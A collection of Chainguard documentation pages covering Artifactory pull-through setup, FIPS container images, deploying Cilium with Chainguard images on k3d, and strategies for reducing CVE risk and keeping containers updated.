✅ ✅ pathchk ✅ ✅ pgrep ✅ ✅ pidof ✅ ✅ ping ✅ ✅ ping6 ✅ ✅ pinky ✅ ✅ pipe_progress ✅ ✅ pivot_root ✅ ✅ pkill ✅ ✅ pmap ✅ ✅ poweroff ✅ pr ✅ ✅ printenv ✅ ✅ ✅ ✅ printf ✅ ✅ ✅ ✅ ps ✅ ✅ pscan ✅ pstree ✅ ✅ ptx ✅ ✅ pwd ✅ ✅ ✅ ✅ pwdx ✅ ✅ raidautorun ✅ rdate ✅ rdev ✅ ✅ readahead ✅ ✅ readlink ✅ ✅ ✅ ✅ realpath ✅ ✅ ✅ ✅ reboot ✅ reformime ✅ remove-shell ✅ ✅ renice ✅ ✅ reset ✅ ✅ resize ✅ ✅ rev ✅ ✅ rfkill ✅ rm ✅ ✅ ✅ ✅ rmdir ✅ ✅ ✅ ✅ rmmod ✅ route ✅ run-parts ✅ ✅ runcon ✅ ✅ sed ✅ ✅ sendmail ✅ seq ✅ ✅ ✅ ✅ setconsole ✅ setfont ✅ setkeycodes ✅ setlogcons ✅ setpriv ✅ ✅ setserial ✅ ✅ setsid ✅ ✅ sh ✅ ✅ sha1sum ✅ ✅ ✅ ✅ sha224sum ✅ ✅ sha256sum ✅ ✅ ✅ ✅ sha384sum ✅ ✅ sha3sum ✅ ✅ sha512sum ✅ ✅ ✅ showkey ✅ shred ✅ ✅ ✅ ✅ shuf ✅ ✅ ✅ ✅ slattach ✅ sleep ✅ ✅ ✅ ✅ sort ✅ ✅ ✅ ✅ split ✅ ✅ ✅ ✅ stat ✅ ✅ ✅ ✅ stdbuf ✅ ✅ strings ✅ ✅ stty ✅ ✅ ✅ ✅ su ✅ ✅ sum ✅ ✅ ✅ ✅ swapoff ✅ swapon ✅ switch_root ✅ sync ✅ ✅ ✅ ✅ sysctl ✅ ✅ syslogd ✅ tac ✅ ✅ ✅ ✅ tail ✅ ✅ ✅ ✅ tar ✅ ✅ tee ✅ ✅ ✅ ✅ test ✅ ✅ ✅ ✅ time ✅ ✅ timeout ✅ ✅ ✅ ✅ top ✅ ✅ touch ✅ ✅ ✅ ✅ tr ✅ ✅ ✅ ✅ traceroute ✅ ✅ traceroute6 ✅ ✅ tree ✅ ✅ true ✅ ✅ ✅ ✅ truncate ✅ ✅ ✅ ✅ tsort ✅ ✅ ✅ tty ✅ ✅ ✅ ✅ ttysize ✅ ✅ tunctl ✅ ✅ udhcpc ✅ udhcpc6 ✅ umount ✅ uname ✅ ✅ ✅ ✅ unexpand ✅ ✅ ✅ ✅ uniq ✅ ✅ ✅ ✅ unix2dos ✅ ✅ unlink ✅ ✅ ✅ ✅ unlzma ✅ ✅ unlzop ✅ ✅ unshare ✅ unxz ✅ ✅ unzip ✅ ✅ uptime ✅ ✅ users ✅ ✅ usleep ✅ ✅ uudecode ✅ ✅ uuencode ✅ ✅ vconfig ✅ ✅ vdir ✅ ✅ vi ✅ ✅ vlock 
✅ ✅ volname ✅ watch ✅ ✅ watchdog ✅ wc ✅ ✅ ✅ ✅ wget ✅ which ✅ ✅ who ✅ ✅ ✅ ✅ whoami ✅ ✅ ✅ ✅ whois ✅ xargs ✅ ✅ xxd ✅ ✅ xzcat ✅ ✅ yes ✅ ✅ ✅ ✅ zcat ✅ ✅ zcip ✅ --- ### How to Set Up Pull Through from Chainguard's Registry to Artifactory URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/artifactory/artifactory-images-pull-through/ Last Modified: September 4, 2024 Tags: Product, Chainguard Containers Organizations can use Chainguard Containers along with third-party software repositories in order to integrate with current workflows as the single source of truth for software artifacts. In this situation, you can set up a remote repository to function as a mirror of Chainguard’s registry — either the public registry or a private one belonging to your organization. This mirror can then serve as a pull through cache for your Chainguard Containers. This tutorial outlines how to set up remote repositories with JFrog Artifactory. Specifically, it will walk you through how to set up one repository you can use as a pull through cache for Chainguard’s public Starter Containers and another you can use with Production Containers originating from a private Chainguard repository. It will also outline how you can use one of Artifactory’s virtual repositories as a pull through cache. Prerequisites In order to complete this tutorial, you will need the following: Administrative privileges over an Artifactory instance. If you’re interested in testing out this configuration, you can set up a trial instance on the JFrog Artifactory landing page. Administrative privileges in Chainguard. chainctl, Chainguard’s command line interface tool, installed on your local machine. To set this up, follow our installation guide for chainctl. Lastly, part of this guide assumes you have access to a private registry provided by Chainguard containing one or more Production container images. If you don’t already have access to these, you can contact our sales team. Setting Up Artifactory as a pull through for Starter Containers Chainguard’s Starter Containers are free to use, publicly available, and always represent versions tagged as :latest. To set up a remote repository in Artifactory from which you can pull Chainguard Starter Containers, log in to the JFrog platform. Once there, click on the Administration tab near the top of the screen and select Repositories from the left-hand navigation menu. On the Repositories page, click the Create a Repository button and select the Remote option. Next, you’ll need to select the type of repository to set up. For the purposes of this guide, select Docker. Following that, you can enter the following details for your new remote repository in the Basic configuration tab: Repository Key — This is used to refer to your repository. You can choose whatever name you like here, but this guide’s examples will use the name cgr-public. URL — This must be set to https://cgr.dev/. Include Patterns — Ensure that you use the default value (**/*) in this field. Lastly, in the Advanced configuration tab, ensure that the Block Mismatching Mime Types option is checked, as it should be by default. Following that, click the Create Remote Repository button. If everything worked as expected, a modal window will appear letting you know that the repository was created successfully. You can click the Set Up Docker Client button at the bottom of this window to retrieve the commands you’ll use to test that you can pull images through this repository. 
Testing pull through of a Chainguard Starter Container After clicking the Set Up Docker Client button, a modal window will appear from the right side of the page. Click the Generate Token & Create Instructions button, which will generate two code blocks whose contents you can copy. The first will be a docker login command similar to the following example. Run the following command in your terminal: docker login -u<linky@chainguard.dev> <myproject>.jfrog.io After running this command, you’ll be prompted to enter a password. Copy the token from the second code block and paste it into your terminal. After running the docker login command, you will be able to pull a Chainguard Starter Container through Artifactory. The following example pulls the go container image: docker pull <myproject>.jfrog.io/cgr-public/chainguard/go Be sure the docker pull command you run includes the name of your project as well as your own repository key in place of cgr-public. Setting Up Artifactory as a pull through for Production Containers Production Chainguard Containers are enterprise-ready container images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness. The process for setting up an Artifactory repository that you can use as a pull through cache for Chainguard Production Containers is similar to the one outlined previously for Starter Containers, but with a few extra steps. To get started, you will need to create a pull token for your organization’s registry. Pull tokens are longer-lived tokens that can be used to pull Containers from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Artifactory. To create a pull token with chainctl, run the following command: chainctl auth configure-docker --pull-token --parent <organization> Be sure to replace <organization> with your organization’s name or ID. Note: You can find your organization’s name or ID by running chainctl iam organizations list -o table. This command will return a docker login command like the following: . . . docker login "cgr.dev" --username "<pull_token_ID>" --password "<password>" Take note of the values for <pull_token_ID> and <password> as you’ll need these credentials when you configure a new remote Artifactory repository for pulling through Production Containers. After noting your credentials, you can begin setting up an Artifactory repository from which you can pull Chainguard Production Containers. This process is similar to the one outlined previously for setting up an Artifactory repository. Create another repository and again select the Remote option. Also, be sure to once again choose Docker as the type of remote repository you want to set up. Enter the following details for your new remote repository in the Basic configuration tab: Repository Key — Again, you can choose whatever name you like here, but this guide’s examples will use the name cgr-private. URL — This must be set to https://cgr.dev/. User Name — Enter the <pull_token_ID> value you noted down from the docker login command Password / Access Token — Enter the <password> value you noted down from the docker login command Include Patterns — Ensure that you use the default value (**/*) in this field. Lastly, in the Advanced configuration tab, ensure that the Block Mismatching Mime Types option is checked. Again, this should be the default. Following that, click the Create Remote Repository button. 
If everything worked as expected, a modal window will appear letting you know that the repository was created successfully. You can click the Set Up Docker Client button at the bottom of this window to retrieve the commands you’ll use to test that you can pull images through this repository. Testing pull through of a Chainguard Production container image After clicking the Set Up Docker Client button, a modal window will appear from the right side of the page. Click the Generate Token & Create Instructions button, which will generate two code blocks. The first will be a docker login command similar to the following example. Copy this command and run it in your terminal: docker login -u<linky@chainguard.dev> <myproject>.jfrog.io Be sure to include your own username and Artifactory instance. After running this command, you’ll be prompted to enter a password. Copy the token from the second code block, paste it into your terminal, and press ENTER. After running the docker login command, you will be able to pull a Chainguard Production Container through Artifactory. The following example will pull the chainguard-base image if your organization has access to it: docker pull <myproject>.jfrog.io/cgr-private/<example.com>/chainguard-base:latest Be sure the docker pull command you run includes the name of your Artifactory project and the name of your organization’s registry. Additionally, if you entered a different repository key in the setup section, use it in place of cgr-private. Setting Up an Artifactory Virtual Repository as a Pull Through Cache Artifactory allows you to create what it refers to as virtual repositories. A virtual repository is a collection of one or more repositories (such as local, remote, or other virtual repositories) that have the same package type. The benefit of this is that you can access resources from multiple locations using a single logical URL. You can also use a virtual repository as a pull through cache. To illustrate, create a new virtual repository. From the Repositories tab, click the Create a Repository button. This time, select the Virtual option and then Docker. On the New Virtual Repository page, enter a key of your choosing into the Repository Key field. Again, you can enter whatever you’d like here, but for this guide we will refer to this repository as cgr-virt. Next, you must select existing repositories to include within this virtual repository. To keep things simple, we will use the cgr-public and cgr-private repositories created previously. Select your repositories by clicking their respective checkboxes. Then be sure to click the right-pointing chevron to move them to the Selected Repositories column. Finally, click the Create Virtual Repository button. As before, a modal window will appear letting you know that the repository was created successfully. Click the Set Up Docker Client button at the bottom of this window to retrieve the docker login command and password you’ll need to test whether you can pull Containers through this repository. Testing pull through with a virtual repository After clicking the Set Up Docker Client button, a modal window will appear from the right side of the page. Again, click the Generate Token & Create Instructions button to generate two code blocks. The first will be a docker login command similar to the following example. Copy this command and run it in your terminal: docker login -u<linky@chainguard.dev> <myproject>.jfrog.io Be sure to include your own username and Artifactory instance.
After running this command, you’ll be prompted to enter a password. Copy the token from the second code block, paste it into your terminal, and press ENTER. After running the docker login command, you will be able to pull Chainguard Containers through Artifactory. To pull a public image, you would run a command like the following example, which will download the public mariadb image: docker pull <myproject>.jfrog.io/cgr-virt/chainguard/mariadb:latest To pull a Production Container, you would replace chainguard with the name of your organization’s registry. The following example will pull the chainguard-base image if your organization has access to it: docker pull <myproject>.jfrog.io/cgr-virt/<example.com>/chainguard-base:latest Be sure the docker pull command you run includes the name of your Artifactory project and the name of your organization’s registry. Also, be sure to enter your own repository key if you entered a different one in place of cgr-virt. Debugging pull through from Chainguard’s registry to Artifactory If you run into issues when trying to pull Containers from Chainguard’s Registry to Artifactory, please ensure the following requirements are met: Ensure that all Containers network requirements are met. Regarding networking, if you attempt to pull a non-existing image via pull-through, Artifactory will also make calls to chainguard.dev and www.chainguard.dev. Calls to these domains should not occur when pulling a valid image. When configuring a remote Artifactory repository, ensure that the URL field is set to https://cgr.dev/. This field must not contain additional components. You can troubleshoot by running docker login from another node (using the Artifactory pull token credentials) and try pulling a container image from cgr.dev/chainguard/<image name> or cgr.dev/<company domain>/<image name>. It may help to clear the Artifactory cache. It could be that your Artifactory repository was misconfigured. In this case, create and configure a new Remote Artifactory repository to test with. Learn more If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by referring to our Containers documentation. If you’d like to learn more about JFrog Artifactory, we encourage you to refer to the official Artifactory documentation. --- ### Chainguard FIPS Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/fips/fips-images/ Last Modified: May 24, 2025 Tags: Chainguard Containers, Product, FIPS What is FIPS? One of the primary requirements of federal compliance frameworks — including FedRAMP — is to use FIPS-validated cryptography. To help customers meet these requirements, Chainguard offers FIPS-enabled versions of many images. This article provides a high-level overview of what FIPS is, what to expect from Chainguard FIPS Containers (which feature a kernel-independent design), and how Chainguard FIPS images stand out from alternatives. Federal Information Processing Standards (FIPS) are publicly announced standards developed by the National Institute of Standards and Technology (NIST) in accordance with the Federal Information Security Management Act (FISMA) and approved by the Secretary of Commerce. FIPS compliance ensures that cryptographic security services within applications meet strict security and integrity standards, and are implemented and configured correctly.
What To Expect from Chainguard FIPS Containers Chainguard warranties are listed on the FIPS Commitment page. That page also includes tables of relevant certifications as well as SBOM indicators of package names and versions. Chainguard Kernel-Independent FIPS Containers Cryptographic protection relies on the secure implementation of a trusted algorithm and a random bit generator that cannot be reasonably predicted at any greater accuracy than random chance. Traditionally, to achieve this compliance requirement, developers were required to provision dedicated hardware and VMs with the host kernel configured in FIPS mode. This is because containers historically accessed the entropy source provided by a certified kernel. In cloud native or shared environments, this requirement significantly increased operational complexity by forcing a dependence on a limited set of FIPS-enabled kernels. Chainguard FIPS Containers remove this friction with a novel design that replaces a kernel entropy source with a userspace one. This implementation enables developers to deploy FIPS workloads using any of the latest kernels, hardware, and instance types. Chainguard FIPS Containers thus unlock the ability to run FIPS workloads on developer machines, existing CI/CD deployments, and even on readily available non-FIPS managed cloud offerings. All this can be done using the latest userspace runtimes like NodeJS, Python, Go, PHP, .NET, and C/C++, among others. Under Chainguard’s novel design, the container image for a given FIPS application can be entirely self-contained, minimal, and distroless. Note: There are some workloads that require a kernel SP 800-90B entropy source or a kernel FIPS module. These include but are not limited to Chainguard FIPS container images shipping Java, k8s CNI plugins, LUKS2 full-disk encryption, and StrongSwan VPN. These use cases will continue to require a kernel in FIPS mode. Read our full blog about Chainguard’s Kernel-Independent FIPS Containers. Developer Guidance for Available FIPS Containers Additional guidance is available for specific container images, like these: go-fips node-fips jdk-fips You can find a full list of Chainguard FIPS Containers at: https://images.chainguard.dev/?category=fips. All of Chainguard’s FIPS Containers have STIGs. Chainguard will take commercially reasonable efforts to ensure applications utilize FIPS-validated cryptographic modules for any cryptographic operations, provided that the parties acknowledge and agree that certain behaviors or functionalities within such applications, which are beyond the direct control of Chainguard, may not fully adhere to FIPS requirements. In the event there are common vulnerabilities and exposures identified, the Chainguard SLA will apply. If Customer requests an image not currently available as a Chainguard FIPS Container, Chainguard will use commercially reasonable efforts to determine if such request is feasible. For further information, contact fips-contact@chainguard.dev. Learn more We encourage you to check our list of FIPS Containers in the Chainguard Containers Directory. After navigating to the directory, you can either click the FIPS tag in the left-hand sidebar menu to filter out any non-FIPS Containers, or use the search function to find every container image with “fips” in its name. Additionally, we encourage you to check out the documentation for the OpenSSL FIPS module and the Bouncy Castle FIPS Crypto package to better understand how they work.
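As a quick, hedged illustration (not part of the official FIPS guidance): if you have access to a FIPS image variant that includes the openssl CLI, such as a -dev variant, you can check that the OpenSSL FIPS provider is loaded. The image reference below is a placeholder.

```shell
# Placeholder image reference; substitute a FIPS image your organization can pull.
docker run --rm --entrypoint openssl \
  cgr.dev/<example.com>/<fips-image>:latest-dev \
  list -providers

# When the FIPS provider is loaded, the output includes a "fips" provider
# entry with "status: active".
```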
Chainguard’s FIPS Containers are not included in our free tier of Starter container images. If you’d like access to one or more of our FIPS-ready container images, please contact us. --- ### Getting Started with the Cilium Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/cilium/ Last Modified: March 22, 2025 Tags: Chainguard Containers, Product Cilium is open source software for transparently securing the network connectivity between application services deployed using Linux container management platforms like Docker and Kubernetes. At the foundation of Cilium is a new Linux kernel technology called eBPF, which enables the dynamic insertion of powerful security visibility and control logic within Linux itself. Because eBPF runs inside the Linux kernel, Cilium security policies can be applied and updated without any changes to the application code or container configuration. Chainguard offers a set of minimal, security-hardened Cilium container images, built on top of the Wolfi OS. We will demonstrate how to get started with the Chainguard Cilium container images on an example K3s cluster. To get started, you’ll need Docker, k3d (a CLI tool to install k3s), kubectl, and the cilium CLI installed. Docker k3d kubectl cilium CLI Note: In November 2024, after this article was first written, Chainguard made changes to its free tier of container images. In order to access the non-free container images used in this guide, you will need to be part of an organization that has access to them. For a full list of container images that will remain in Chainguard's free tier, please refer to this support page. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Containers Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Start up a K3s cluster Cilium does not work with the default Container Network Interface (CNI) plugin in K3s, so we’ll start up our K3s cluster with the default CNI and network policy disabled. To do so, create a YAML manifest named k3d.yaml with the following command: cat > k3d.yaml <<EOF apiVersion: k3d.io/v1alpha5 kind: Simple image: cgr.dev/chainguard/k3s:latest servers: 1 options: k3s: extraArgs: # Cilium requires network policy and CNI to be turned off - arg: --disable-network-policy nodeFilters: - server:* - arg: --flannel-backend=none nodeFilters: - server:* EOF Then, we’ll start up the cluster: k3d cluster create --config k3d.yaml If cluster creation fails with errors, check that Docker is running. Next, Cilium requires some system mounts for the nodes. Run the following command to configure the mounts: for node in $(kubectl get nodes -o jsonpath='{.items[*].metadata.name}'); do echo "Configuring mounts for $node" docker exec -i $node /bin/sh <<-EOF mount bpffs -t bpf /sys/fs/bpf mount --make-shared /sys/fs/bpf mkdir -p /run/cilium/cgroupv2 mount -t cgroup2 none /run/cilium/cgroupv2 mount --make-shared /run/cilium/cgroupv2/ EOF done For more information, refer to the settings suggested in the Cilium documentation. With that, you’re ready to install Cilium.
Install Cilium using Chainguard Containers We will use the Cilium CLI to install Cilium. In order to use Chainguard Containers, we must first set the following values: export ORGANIZATION=<your-Chainguard-organization> export AGENT_IMAGE=cgr.dev/$ORGANIZATION/cilium-agent:latest export HUBBLE_RELAY_IMAGE=cgr.dev/$ORGANIZATION/cilium-hubble-relay:latest export HUBBLE_UI_IMAGE=cgr.dev/$ORGANIZATION/cilium-hubble-ui:latest export HUBBLE_UI_BACKEND_IMAGE=cgr.dev/$ORGANIZATION/cilium-hubble-ui-backend:latest export OPERATOR_IMAGE=cgr.dev/$ORGANIZATION/cilium-operator-generic:latest Note: If you don’t remember the name of your Chainguard organization, you can find it by running chainctl iam organizations list -o table. After that, install Cilium using the following command: cilium install \ --helm-set hubble.relay.enabled=true \ --helm-set hubble.ui.enabled=true \ --helm-set image.override=$AGENT_IMAGE \ --helm-set hubble.relay.image.override=$HUBBLE_RELAY_IMAGE \ --helm-set hubble.ui.frontend.image.override=$HUBBLE_UI_IMAGE \ --helm-set hubble.ui.backend.image.override=$HUBBLE_UI_BACKEND_IMAGE \ --helm-set operator.image.override=$OPERATOR_IMAGE This will return output similar to the following: 🔮 Auto-detected Kubernetes kind: K3s ℹ️ Using Cilium version 1.14.2 🔮 Auto-detected cluster name: k3d-k3s-default Now that your cluster has a CNI plugin installed, the Pods will start to transition to the Running state. This may take a few minutes. Run the following command to check the status of the Pods: watch kubectl get pods --all-namespaces When all the Pods have a status of Running or Completed, press Ctrl+C to exit the watch. Verify that the Cilium installation is successful Cilium comes with the connectivity test command, which is useful for verifying whether the Cilium installation was successful. Run the following command to start the connectivity test: # We skip one of the tests because it needs `jq` util on the agent image, which we don't bundle. cilium connectivity test \ --external-cidr 8.0.0.0/8 \ --external-ip 8.8.8.8 \ --external-other-ip 8.8.4.4 \ --test \!no-unexpected-packet-drops This should take about 5 minutes to complete. It will return output similar to the following: ℹ️ Single-node environment detected, enabling single-node connectivity test ℹ️ Monitor aggregation detected, will skip some flow validation steps ✨ [k3d-k3s-default] Creating namespace cilium-test for connectivity check... ✨ [k3d-k3s-default] Deploying echo-same-node service... ✨ [k3d-k3s-default] Deploying DNS test server configmap... ✨ [k3d-k3s-default] Deploying same-node deployment... ✨ [k3d-k3s-default] Deploying client deployment... ✨ [k3d-k3s-default] Deploying client2 deployment... ⌛ [k3d-k3s-default] Waiting for deployment cilium-test/client to become ready... ⌛ [k3d-k3s-default] Waiting for deployment cilium-test/client2 to become ready... ... ✅ All 32 tests (263 actions) successful, 2 tests skipped, 1 scenarios skipped. Note that the exact output and results of individual tests may differ based on your local machine’s configuration. Exploring the Cilium Hubble UI Before you can explore the Hubble user interface, you will need to enable it with the cilium command: cilium hubble enable --ui Then run the following command to bring up the Hubble UI: cilium hubble ui A new browser window will open showing the Hubble UI. You can explore the Hubble UI to see the network traffic in your cluster. If you are running this during the connectivity test, it will show a visualization of the test traffic.
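If a browser window does not open automatically (for example, when working on a remote host), a manual port-forward to the Hubble UI service is a common alternative. This is a hedged sketch: the hubble-ui service name and kube-system namespace are the Cilium defaults and may differ in customized installations.

```shell
# Forward the Hubble UI service to a local port, then browse to http://localhost:12000
kubectl -n kube-system port-forward svc/hubble-ui 12000:80
```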
Clean up your K3s cluster Once you are done exploring Cilium, you can clean up your K3s cluster by running the following command: k3d cluster delete Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Cilium Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk, you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as a base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Strategies for Minimizing your CVE Risk URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/cve-risk/ Last Modified: March 29, 2024 Tags: Conceptual, Chainguard Containers, CVE Common vulnerabilities and exposures, often referred to as “CVEs”, are an increasing concern for both developers and consumers of software. A new CVE that appears in a widely-used application or a vulnerability scan with a large number of positive results would naturally be worrisome for developers, CISOs, and end users alike. Chances are, your software has already been impacted by a CVE. It’s likely there are active CVEs in software you are using. After all, there are software vulnerabilities currently in existence that haven’t even been discovered (known as zero-day vulnerabilities). With that said, this conceptual article aims to highlight a few practices and strategies you and your team can use to reduce the risk of CVEs on your software. It also includes a section on tools recommended by Chainguard that can help to reduce your attack surface area and minimize your risk of CVEs. Understanding potential risks An important step to minimizing your CVE risk is to understand the potential impacts and develop a sense of how CVEs can make their way into your applications. One way you can do this is to familiarize yourself with the various databases that list known CVEs and their exploitations, including the CVE Program and the Known Exploited Vulnerabilities (KEV) Catalog. It also might be helpful to stay up to date with industry news. Software vulnerabilities and attacks have gained more attention from technology journalists. For example, the Heartbleed vulnerability received widespread coverage when it was discovered in 2014, as did the Log4Shell vulnerability in 2021. Bear in mind, just keeping up to date with industry news and recent CVEs won’t prevent vulnerabilities from encroaching on your projects. After all, malicious actors could be exploiting a vulnerability in your code long before the CVE is discovered and reported. Having said that, understanding how vulnerabilities are discovered, categorized, and exploited can be useful when thinking about how to harden your system’s defenses. Another way to prepare yourself for the potential risks associated with CVEs is to have a plan in place for what you should do if new vulnerabilities affecting your software arise. It’s becoming more common for organizations to build out such a playbook ahead of time.
The Cybersecurity & Infrastructure Security Agency (CISA) recently published a Vulnerability Response Playbook. The goal of this playbook is to provide a framework for Federal Civilian Executive Branch agencies to identify and mitigate vulnerabilities. Although this playbook is meant specifically for organizations working with the federal government, the idea of having a plan in place ahead of a vulnerability is a great way to minimize the risk. Maintaining dependency hygiene Dependency hygiene is the practice of ensuring that the dependencies you introduce into your project do not contain vulnerabilities. We’ve found that many popular container images, when not updated, will accumulate about one known vulnerability per day. Many of the most widely used container images aren’t updated regularly and past academic software engineering research has found that most images on Docker Hub, the most widely used container registry, have not been updated for over 120 days. Some teams go so far as to actively avoid using dependencies, working under the belief that taking a “roll-your-own” approach to all their tooling is an effective way to reduce CVEs. Although first-party tools may report fewer CVEs when scanned, they won’t be battle-tested like widely used open-source software, meaning there are drawbacks to this approach. Recommended tools This section outlines a few categories of tools that can be useful for minimizing CVEs, and provides a few examples for each. Scanners There are a number of tools available that allow you to scan your third party code for CVEs. At Chainguard, we use Grype to scan our own Chainguard Containers, as it’s open-source and it can scan Software Bills of Materials (or SBOMs). Additionally, Grype biases towards false positives over false negatives. Looking into a vulnerability in an image that turns out to be a false positive can be preferable to overlooking a real vulnerability that impacts end users. Another open-source scanning option is Falco. Falco works with environments running in individual containers, hosts, Kubernetes, and the cloud. Falco works by collecting data from various sources — including Linux kernel syscalls, Kubernetes audit logs, and events from systems like GitHub or Okta — and compares them with a set of rules. Falco comes with a list of rules by default, but you can also create your own rules to suit the needs of your project. If any of the collected data breaks one of the rules, Falco will identify it as a security issue. Be aware that the results of a vulnerability scan can only tell you part of the story. Say, for example, that Project A has only a few dependencies while Project B has many. Logically, a vulnerability scan of Project A will likely return fewer results than one for Project B, but that doesn’t mean that Project A is at any less of a risk. Although its results might show only a few CVEs, one of these vulnerabilities could still have a serious impact on Project A. Conversely, Project B’s scan results might show a large number of CVEs, but most or all of these could be false positives. Scorecard is another scanning tool, though it isn’t specifically a vulnerability scanner. Scorecard is an automated tool from the Open Source Security Foundation that performs a variety of security checks on software, returning a score between 1 and 10 for each one. These scores can help you understand what you need to work on to improve your project’s security, and can also help you assess the security of your dependencies. 
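As a brief, hedged illustration of how these scanners are commonly invoked (the image and repository names below are placeholders, and flags should be verified against each tool's current documentation):

```shell
# Scan a container image for known vulnerabilities with Grype.
grype cgr.dev/chainguard/wolfi-base:latest

# Grype can also scan an SBOM file directly, for example one in SPDX JSON format.
grype sbom:./my-image.spdx.json

# Run OpenSSF Scorecard checks against a public repository (placeholder repo).
scorecard --repo=github.com/<org>/<repo>
```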
For a more in-depth discussion of how scanners may fail to collect certain information, we encourage you to check out our blog post on “Software Dark Matter”. Automating updates As stated in the preceding section on dependency hygiene, out-of-date dependencies pose a serious risk to software projects. The older and more out of date a given dependency is, the more likely it is to contain vulnerabilities. Automating updates for your projects can help avoid the problems associated with outdated dependencies. One tool that’s useful for automating updates for your dependencies is Dependabot. Dependabot is a free tool offered by GitHub that sends alerts to repositories affected by new vulnerabilities and — if possible — raises a pull request to update the affected dependencies. If you’d like to automate updates outside of GitHub repositories, Snyk is another tool that enables automatic updates. Snyk can integrate into IDEs as well as repositories, allowing you to continuously scan for vulnerabilities. Like Dependabot, Snyk will automatically submit a pull request when it encounters a vulnerability and it can recommend a solution. There are a number of important considerations one should make when keeping container images up to date. Please check out our conceptual article on the subject. Minimal container images As mentioned previously, the fewer dependencies a given piece of software uses, the lower the likelihood that it will be impacted by CVEs. To this end, Chainguard provides a library of minimal container images that can minimize your CVE risk. Chainguard Containers are distroless, meaning they contain only an application and its runtime dependencies. These images do not even contain a shell or package manager. Because Chainguard Containers minimize the number of dependencies in this manner and thus reduce the potential attack surface, they inherently contain few to zero CVEs. Also, Chainguard Containers are rebuilt nightly to ensure images are completely up-to-date and contain all available security patches, and the engineering team often fixes vulnerabilities before they’re detected. If you’re looking for a certain image that isn’t included in Chainguard’s library, you can build your own minimal container images with Wolfi, a community Linux distribution designed by Chainguard for the container and cloud-native era. Chainguard started the Wolfi project to enable building Chainguard Containers, which required a Linux distribution with components at the appropriate granularity and with support for glibc. Wolfi includes a fully declarative build system and provides a high-quality, build-time SBOM as standard for all packages. Its packages are designed to be granular and independent — in order to support minimal images — and use the proven and reliable apk package format. Please note that as of March of 2024, Chainguard will maintain one version of each Wolfi package at a time. These track the latest version of the upstream software in the package. Chainguard does not provide patch support for previous versions of packages in Wolfi. Existing packages will not be removed from Wolfi and you may continue to use them, but be aware that older packages will no longer be updated and will accrue vulnerabilities over time. This change ensures that Chainguard can provide the most up-to-date patches to all packages for our container image users. Note that specific package versions can be made available in Production Containers; if you have a request for a specific package version, please contact support.
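As a minimal, hedged sketch of what building your own image on Wolfi can look like (the package name below is illustrative; check the Wolfi package repository for the packages you actually need):

```Dockerfile
# Illustrative only: start from the wolfi-base image and add packages with apk.
FROM cgr.dev/chainguard/wolfi-base

# Be explicit about running package installs as root; this matters if you
# later switch to a base image that defaults to a non-root user.
USER root
RUN apk add --no-cache python-3.12

ENTRYPOINT ["python3"]
```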
Learn more As mentioned in the introduction, there’s no way to guarantee that no CVEs will affect your software. However, we hope that by reading this article you’ll have learned some practical tips you can use to help minimize your exposure to vulnerabilities and keep your software secure. If you’d like to learn more about CVEs, and strategies for remediating them, we encourage you to check out the following resources: What Are Software Vulnerabilities and CVEs? False Positives and False Negatives with Containers Scanners Considerations for Keeping Containers Up to Date --- ### Considerations for Keeping Containers Up to Date URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/considerations-for-image-updates/ Last Modified: October 11, 2023 Tags: Chainguard Containers, Product It is essential to keep container images up-to-date in order to receive critical security updates and leverage new features. However, updates come with a risk: any time new code is introduced, there is a chance for breaking changes or other impacts on dependent systems. Due to the complexity involved in modern containerized applications, there is no one-size-fits-all approach to keeping your container images up to date. With these competing concerns in mind, this article will explore how best to keep container images up-to-date. Understanding image versioning and naming conventions Before discussing image updates, it’s helpful to have a baseline understanding of how images are typically versioned and named. Semantic versioning — also known as “semver” — is a system for determining how version numbers are assigned to a given piece of software. Software using semver has versions numbered in the format of X.Y.Z. X is reserved for major versions that are backwards incompatible, Y is used for minor versions that are backward compatible, and Z is used for patches and bug fixes. As an example, for a piece of software with the version number 3.5.2, 3 is the major version, 5 is the minor version, and 2 is the patch number. Semantic versioning is intended to address problems associated with having a large number of dependencies. Although semver has become a common practice throughout the software industry, it isn’t used universally. When referencing an image, it’s important to know exactly what image you are working with. Docker uses the following format for image names. [host]/[repository]/[image_name][:tag] For example, the full name for the Go Chainguard Container is cgr.dev/chainguard/go:latest. Certain elements of this name format are optional in many cases. For instance, if you omit the hostname portion of an image name in either Docker or Kubernetes, both will default to using the public Docker registry. Automating updates One solution to avoiding out-of-date container images would be to automate the process of updating images. This may be a system that scans a container registry for new versions of a given image and updates the application any time a new version of an image is released. However, you will need to consider a few specific details around your particular software and organization’s situation prior to fully automating container image updates, as you may run into issues with breaking changes upstream. You’ll want to think through the following: What is your risk appetite: is your software part of critical infrastructure or is its function of less urgent importance? What tests do you have in place?
